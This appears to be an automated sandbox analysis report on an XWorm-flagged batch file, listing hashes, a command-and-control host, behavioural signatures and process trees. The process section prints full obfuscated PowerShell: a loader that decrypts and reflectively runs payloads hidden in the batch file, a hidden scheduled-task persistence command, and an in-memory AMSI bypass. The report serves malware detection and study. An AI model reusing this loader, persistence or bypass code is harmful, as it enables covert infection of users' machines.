Analysis
-
max time kernel
7s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
24/08/2024, 02:32
Static task
static1
Behavioral task
behavioral1
Sample
Uni UAC.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni UAC.bat
Resource
win7-20240729-en
Behavioral task
behavioral3
Sample
Uni UAC.bat
Resource
win10v2004-20240802-en
General
-
Target
Uni UAC.bat
-
Size
491KB
-
MD5
08198ac27c6c5bea0bf333a871000b42
-
SHA1
e54f3ddc8786b896b20bff91ca0e608906cc9058
-
SHA256
354760e3510b9d9701c589972053907d76560a95011bc71cc3e195d32fa2d8f8
-
SHA512
51610e1ba366a6540947328780b8d3158bae3035773f0b63c257b75f0cbfa4ee94db0ab687ac98df6a4a85d6d49d5e55d7e6ece2238065be4214cc7dd91168ce
-
SSDEEP
12288:Z4eORmrVMf6fA67wgmcpkJNDwUW5fcQ11HDgkvujQXw:Y2afV2/kJrIcQflvKQg
Malware Config
Extracted
xworm
127.0.0.1:55199
hill-java.gl.at.ply.gg:55199
-
Install_directory
%AppData%
-
install_file
Uni.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral4/memory/1624-50-0x000001E8FD0D0000-0x000001E8FD0E8000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1888 created 644 1888 powershell.EXE 5 -
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell and hide display window.
pid Process 1660 powershell.exe 4772 powershell.exe 1624 powershell.exe 1888 powershell.EXE -
Executes dropped EXE 1 IoCs
pid Process 1092 Install.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1888 set thread context of 4084 1888 powershell.EXE 95 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Install.exe -
Checks processor information in registry 2 TTPs 7 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision wermgr.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe -
Modifies data under HKEY_USERS 41 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-661032028-162657920-1226909816-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 1660 powershell.exe 1660 powershell.exe 4772 powershell.exe 4772 powershell.exe 1624 powershell.exe 1624 powershell.exe 1888 powershell.EXE 1888 powershell.EXE 1888 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1660 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeIncreaseQuotaPrivilege 4772 powershell.exe Token: SeSecurityPrivilege 4772 powershell.exe Token: SeTakeOwnershipPrivilege 4772 powershell.exe Token: SeLoadDriverPrivilege 4772 powershell.exe Token: SeSystemProfilePrivilege 4772 powershell.exe Token: SeSystemtimePrivilege 4772 powershell.exe Token: SeProfSingleProcessPrivilege 4772 powershell.exe Token: SeIncBasePriorityPrivilege 4772 powershell.exe Token: SeCreatePagefilePrivilege 4772 powershell.exe Token: SeBackupPrivilege 4772 powershell.exe Token: SeRestorePrivilege 4772 powershell.exe Token: SeShutdownPrivilege 4772 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeSystemEnvironmentPrivilege 4772 powershell.exe Token: SeRemoteShutdownPrivilege 4772 powershell.exe Token: SeUndockPrivilege 4772 powershell.exe Token: SeManageVolumePrivilege 4772 powershell.exe Token: 33 4772 powershell.exe Token: 34 4772 powershell.exe Token: 35 4772 powershell.exe Token: 36 4772 powershell.exe Token: SeIncreaseQuotaPrivilege 4772 powershell.exe Token: SeSecurityPrivilege 4772 powershell.exe Token: SeTakeOwnershipPrivilege 4772 powershell.exe Token: SeLoadDriverPrivilege 4772 powershell.exe Token: SeSystemProfilePrivilege 4772 powershell.exe Token: SeSystemtimePrivilege 4772 powershell.exe Token: SeProfSingleProcessPrivilege 4772 powershell.exe Token: SeIncBasePriorityPrivilege 4772 powershell.exe Token: SeCreatePagefilePrivilege 4772 powershell.exe Token: SeBackupPrivilege 4772 powershell.exe Token: SeRestorePrivilege 4772 powershell.exe Token: SeShutdownPrivilege 4772 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeSystemEnvironmentPrivilege 4772 powershell.exe Token: SeRemoteShutdownPrivilege 4772 powershell.exe Token: SeUndockPrivilege 4772 powershell.exe Token: SeManageVolumePrivilege 4772 powershell.exe Token: 33 4772 powershell.exe Token: 34 4772 powershell.exe Token: 35 4772 powershell.exe Token: 36 4772 powershell.exe Token: SeIncreaseQuotaPrivilege 4772 powershell.exe Token: SeSecurityPrivilege 4772 powershell.exe Token: SeTakeOwnershipPrivilege 4772 powershell.exe Token: SeLoadDriverPrivilege 4772 powershell.exe Token: SeSystemProfilePrivilege 4772 powershell.exe Token: SeSystemtimePrivilege 4772 powershell.exe Token: SeProfSingleProcessPrivilege 4772 powershell.exe Token: SeIncBasePriorityPrivilege 4772 powershell.exe Token: SeCreatePagefilePrivilege 4772 powershell.exe Token: SeBackupPrivilege 4772 powershell.exe Token: SeRestorePrivilege 4772 powershell.exe Token: SeShutdownPrivilege 4772 powershell.exe Token: SeDebugPrivilege 4772 powershell.exe Token: SeSystemEnvironmentPrivilege 4772 powershell.exe Token: SeRemoteShutdownPrivilege 4772 powershell.exe Token: SeUndockPrivilege 4772 powershell.exe Token: SeManageVolumePrivilege 4772 powershell.exe Token: 33 4772 powershell.exe Token: 34 4772 powershell.exe Token: 35 4772 powershell.exe -
Suspicious use of WriteProcessMemory 23 IoCs
description pid Process procid_target PID 4460 wrote to memory of 1660 4460 cmd.exe 82 PID 4460 wrote to memory of 1660 4460 cmd.exe 82 PID 1660 wrote to memory of 4772 1660 powershell.exe 83 PID 1660 wrote to memory of 4772 1660 powershell.exe 83 PID 1660 wrote to memory of 4252 1660 powershell.exe 86 PID 1660 wrote to memory of 4252 1660 powershell.exe 86 PID 4252 wrote to memory of 3404 4252 WScript.exe 87 PID 4252 wrote to memory of 3404 4252 WScript.exe 87 PID 3404 wrote to memory of 1624 3404 cmd.exe 89 PID 3404 wrote to memory of 1624 3404 cmd.exe 89 PID 1624 wrote to memory of 1092 1624 powershell.exe 90 PID 1624 wrote to memory of 1092 1624 powershell.exe 90 PID 1624 wrote to memory of 1092 1624 powershell.exe 90 PID 1624 wrote to memory of 2448 1624 powershell.exe 91 PID 1624 wrote to memory of 2448 1624 powershell.exe 91 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95 PID 1888 wrote to memory of 4084 1888 powershell.EXE 95
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:644
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{c60e1180-28db-46ec-926a-d182c0dd670d}2⤵PID:4084
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni UAC.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZvJuy4KvG2qUUCZrRgrAVKkrFSJglwq3d5XK6vg+gYo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/AM8R8o9COOj20k0BfyCzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $wqNxk=New-Object System.IO.MemoryStream(,$param_var); $cEvRP=New-Object System.IO.MemoryStream; $OAMgS=New-Object System.IO.Compression.GZipStream($wqNxk, [IO.Compression.CompressionMode]::Decompress); $OAMgS.CopyTo($cEvRP); $OAMgS.Dispose(); $wqNxk.Dispose(); $cEvRP.Dispose(); $cEvRP.ToArray();}function execute_function($param_var,$param2_var){ $StTSG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnmyK=$StTSG.EntryPoint; $XnmyK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni UAC.bat';$Mxmme=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni UAC.bat').Split([Environment]::NewLine);foreach ($cpXjM in $Mxmme) { if ($cpXjM.StartsWith(':: ')) { $jrLJS=$cpXjM.Substring(3); break; }}$payloads_var=[string[]]$jrLJS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1660 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_654_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_654.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4772
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_654.vbs"3⤵
- Suspicious use of WriteProcessMemory
PID:4252 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_654.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:3404 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZvJuy4KvG2qUUCZrRgrAVKkrFSJglwq3d5XK6vg+gYo='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/AM8R8o9COOj20k0BfyCzw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $wqNxk=New-Object System.IO.MemoryStream(,$param_var); $cEvRP=New-Object System.IO.MemoryStream; $OAMgS=New-Object System.IO.Compression.GZipStream($wqNxk, [IO.Compression.CompressionMode]::Decompress); $OAMgS.CopyTo($cEvRP); $OAMgS.Dispose(); $wqNxk.Dispose(); $cEvRP.Dispose(); $cEvRP.ToArray();}function execute_function($param_var,$param2_var){ $StTSG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XnmyK=$StTSG.EntryPoint; $XnmyK.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_654.bat';$Mxmme=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_654.bat').Split([Environment]::NewLine);foreach ($cpXjM in $Mxmme) { if ($cpXjM.StartsWith(':: ')) { $jrLJS=$cpXjM.Substring(3); break; }}$payloads_var=[string[]]$jrLJS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1624 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1092
-
-
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "1624" "2516" "2548" "2528" "0" "0" "2764" "0" "0" "0" "0" "0"6⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2448
-
-
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:icTDyQZdlLoO{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$NBxpktTbgGQkoN,[Parameter(Position=1)][Type]$bAIfLisrBr)$uTMqQFrDjKo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+'l'+''+[Char](101)+'c'+'t'+''+'e'+''+'d'+'D'+[Char](101)+''+[Char](108)+''+'e'+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'nM'+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType(''+'M'+''+'y'+''+'D'+''+'e'+'l'+[Char](101)+'g'+'a'+''+'t'+''+[Char](101)+'T'+'y'+'pe',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+'P'+[Char](117)+''+'b'+'l'+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+'e'+'a'+''+'l'+'e'+'d'+''+','+''+'A'+''+'n'+'s'+[Char](105)+'C'+[Char](108)+'a'+[Char](115)+'s'+[Char](44)+'A'+'u'+''+[Char](116)+''+'o'+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$uTMqQFrDjKo.DefineConstructor(''+'R'+''+'T'+''+[Char](83)+''+[Char](112)+'ec'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+'a'+''+[Char](109)+''+'e'+''+','+''+[Char](72)+''+[Char](105)+'d'+'e'+''+'B'+'y'+[Char](83)+''+'i'+'g,P'+'u'+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$NBxpktTbgGQkoN).SetImplementationFlags(''+'R'+''+'u'+'nt'+'i'+''+[Char](109)+'e'+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+'g'+[Char](101)+''+[Char](100)+'');$uTMqQFrDjKo.DefineMethod(''+[Char](73)+'n'+[Char](118)+'o'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ub'+'l'+''+[Char](105)+''+'c'+''+','+'Hi'+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+','+''+[Char](78)+'ewSlot'+[Char](44)+''+'V'+''+[Char](105)+''+'r'+'t'+[Char](117)+''+'a'+''+[Char](108)+'',$bAIfLisrBr,$NBxpktTbgGQkoN).SetImplementationFlags(''+[Char](82)+'un'+'t'+''+'i'+''+[Char](109)+''+[Char](101)+''+','+'M'+'a'+''+'n'+'a'+[Char](103)+'e'+[Char](100)+'');Write-Output $uTMqQFrDjKo.CreateType();}$BndjtckwCQSvD=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+'tem'+[Char](46)+''+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType('M'+[Char](105)+''+'c'+'ro'+'s'+''+[Char](111)+''+'f'+''+'t'+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+'f'+''+[Char](101)+''+[Char](78)+''+'a'+''+'t'+''+[Char](105)+'v'+'e'+''+[Char](77)+''+[Char](101)+'t'+'h'+'o'+'d'+''+'s'+'');$rvirJwJmFNreIx=$BndjtckwCQSvD.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+[Char](80)+''+[Char](114)+''+'o'+''+[Char](99)+''+[Char](65)+'d'+[Char](100)+'re'+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+'S'+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$TxbsYkdEZeVshgIWxvl=icTDyQZdlLoO @([String])([IntPtr]);$YYvcGlilDdpmbYUgZDCNVb=icTDyQZdlLoO @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$oEGqRYvxhhH=$BndjtckwCQSvD.GetMethod('Ge'+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+'e'+[Char](72)+''+[Char](97)+'n'+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+'k'+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+'2'+''+'.'+''+[Char](100)+''+[Char](108)+''+'l'+'')));$TVWbdYPWsaYnBu=$rvirJwJmFNreIx.Invoke($Null,@([Object]$oEGqRYvxhhH,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+''+[Char](97)+'r'+[Char](121)+''+'A'+'')));$xEJOVVAbWORtIHDhH=$rvirJwJmFNreIx.Invoke($Null,@([Object]$oEGqRYvxhhH,[Object]('V'+[Char](105)+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+''+[Char](111)+''+'t'+''+'e'+'ct')));$XqZUSxh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($TVWbdYPWsaYnBu,$TxbsYkdEZeVshgIWxvl).Invoke(''+'a'+''+'m'+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$SVZpCvqWBWMXjKawn=$rvirJwJmFNreIx.Invoke($Null,@([Object]$XqZUSxh,[Object](''+'A'+'m'+[Char](115)+''+'i'+''+[Char](83)+''+[Char](99)+'anB'+'u'+''+[Char](102)+'f'+[Char](101)+'r')));$JiEGzaMzOt=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xEJOVVAbWORtIHDhH,$YYvcGlilDdpmbYUgZDCNVb).Invoke($SVZpCvqWBWMXjKawn,[uint32]8,4,[ref]$JiEGzaMzOt);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$SVZpCvqWBWMXjKawn,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xEJOVVAbWORtIHDhH,$YYvcGlilDdpmbYUgZDCNVb).Invoke($SVZpCvqWBWMXjKawn,[uint32]8,0x20,[ref]$JiEGzaMzOt);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+''+[Char](70)+'T'+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+'s'+[Char](116)+''+'a'+'ge'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1888
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
Filesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
Filesize
163KB
MD5051b3f7c30caf2eedbed29daa6192efb
SHA1a3e0f31e4b4367e5af06f71e7718e7d64ceb250d
SHA2566cd0c5b5b528c15ad28d9f8e44ee2b4e46d8942e8c0592e89c056a3a3661c3b3
SHA51293288a5e145ebf48fb5b536cf331159dad81c1c0458099b5cfc649fddc9a5755739cab9d46c8a3f562dba1ed7ed4852c51eaebd73e9ea8ee28f053df22c74158
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
491KB
MD508198ac27c6c5bea0bf333a871000b42
SHA1e54f3ddc8786b896b20bff91ca0e608906cc9058
SHA256354760e3510b9d9701c589972053907d76560a95011bc71cc3e195d32fa2d8f8
SHA51251610e1ba366a6540947328780b8d3158bae3035773f0b63c257b75f0cbfa4ee94db0ab687ac98df6a4a85d6d49d5e55d7e6ece2238065be4214cc7dd91168ce
-
Filesize
115B
MD5369c9621f579a3064a856ab756c070f2
SHA1090ebe9d4f69a371c418c948555acdc6af69be83
SHA2569e1beabbe466d948ad63dde84b5bd5e9a95353bfdd27b16501fad6fd818e046e
SHA51291babd21f224e4921d83da2874a79a52fad87dd8579ce2fad25749a1cb552c87a65e04900333d6502323c4d07dc93417decc45a621e3b75c476be64dd1a31608